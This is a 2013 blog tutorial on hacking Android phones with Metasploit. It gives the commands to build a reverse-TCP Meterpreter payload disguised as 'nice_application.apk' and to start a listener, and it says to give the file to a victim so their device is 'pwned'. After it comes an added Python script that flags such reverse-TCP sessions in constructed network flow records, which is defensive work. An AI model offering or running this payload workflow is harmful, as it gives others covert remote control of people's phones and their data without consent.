Monday, 29 July 2013

How To Hack Android Devices Using Metasploit's Android Meterpreter Payload


Metasploit has released an Android Meterpreter payload as well, so in this tutorial I will show you how to use it to hack into an Android device.
Android Meterpreter isn't very powerful at the moment, but it's still cool enough to pwn someone :)

So let's start!

Step 1:
The first thing you need to do is update your Metasploit installation. Do it with the following command.

sudo msfupdate
The above command will update Metasploit, and you will then have all of its latest modules, including the android/meterpreter/reverse_tcp and android/shell/reverse_tcp payloads.


Step 2:
Now generate the msfpayload stager that will be sent to the victim. Execute the following command to generate it.
sudo msfpayload android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 R > nice_application.apk
In the above command, X.X.X.X is your LAN/Wi-Fi IP (e.g. 192.168.1.10) and LPORT is the port on your machine to which the victim's Android device will open the reverse_tcp connection. You can use any port number except the well-known ports (the port numbers in the range from 0 to 1023 are the well-known ports).
Note: If you want to use it over the Internet/WAN, first forward your router's ports to your IP and then put your external IP in place of X.X.X.X. You can watch my tutorial on Metasploit usage over the Internet/WAN for a better understanding.

Step 3:
Now start Metasploit and start a multi handler on your machine to receive the reverse TCP connection from the victim, using the following commands. Below, X.X.X.X is the same IP that you gave in the payload.
sudo msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost X.X.X.X
set lport 4444
exploit
A multi handler will start on your machine and wait for a reverse_tcp connection from the victim's side.

Final Step:
Now give your payload stager to someone and wait for its execution. When the victim executes it, it will return a reverse connection and the device will be pwned :D

On successful exploitation, you will see the following output.


Watch my video tutorial (try 720p resolution for a better result):
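
Seen from the network, the reverse_tcp connection set up in Steps 2 and 3 is a TCP session opened by the phone to an unprivileged port on another machine. The following is an added detection example, not part of the original post, that flags such sessions in flow records. The record format, subnet, gateway address and thresholds are assumptions, and the sample records are constructed.

```python
import ipaddress

# Constructed sample flow records (assumed format, not from the original post):
# timestamp  proto  src_ip:port  dst_ip:port  seconds_open
SAMPLE_FLOWS = """\
2013-07-29T10:01:02 tcp 192.168.1.23:49152 93.184.216.34:443 12
2013-07-29T10:01:09 tcp 192.168.1.23:38211 192.168.1.10:4444 1840
2013-07-29T10:02:30 udp 192.168.1.23:5353 224.0.0.251:5353 0
2013-07-29T10:03:44 tcp 192.168.1.40:51000 192.168.1.1:53 1
2013-07-29T10:04:10 tcp 192.168.1.41:40022 203.0.113.7:4444 600
"""

WIFI_CLIENTS = ipaddress.ip_network("192.168.1.0/24")  # assumed Wi-Fi client subnet
GATEWAY = ipaddress.ip_address("192.168.1.1")          # assumed router address
WATCHED_PORTS = {4444}   # LPORT used in the tutorial; any other port can be chosen
MIN_SECONDS = 300        # assumed threshold for a "long-lived" session

def parse(line):
    ts, proto, src, dst, secs = line.split()
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {"ts": ts, "proto": proto,
            "src": ipaddress.ip_address(src.rsplit(":", 1)[0]),
            "dst": ipaddress.ip_address(dst_ip),
            "dport": int(dst_port), "secs": int(secs)}

def reasons_for(flow):
    """Return the indicators a flow matches; a single one alone is weak evidence."""
    if flow["proto"] != "tcp" or flow["src"] not in WIFI_CLIENTS:
        return []
    if flow["dport"] < 1024:          # the tutorial avoids well-known ports
        return []
    reasons = []
    if flow["dport"] in WATCHED_PORTS:
        reasons.append("watched-port")
    if flow["dst"] in WIFI_CLIENTS and flow["dst"] != GATEWAY:
        reasons.append("lan-peer")    # client-to-client session inside the LAN
    if flow["secs"] >= MIN_SECONDS:
        reasons.append("long-lived")
    return reasons

def suspicious(text, min_reasons=2):
    """Return (timestamp, source, destination, reasons) for flows worth triage."""
    hits = []
    for line in filter(str.strip, text.splitlines()):
        flow = parse(line)
        reasons = reasons_for(flow)
        if len(reasons) >= min_reasons:
            hits.append((flow["ts"], str(flow["src"]),
                         f'{flow["dst"]}:{flow["dport"]}', reasons))
    return hits
```

Because the listener port is freely chosen, the port match is only one indicator; the LAN-peer and session-length checks still apply when a different port is used.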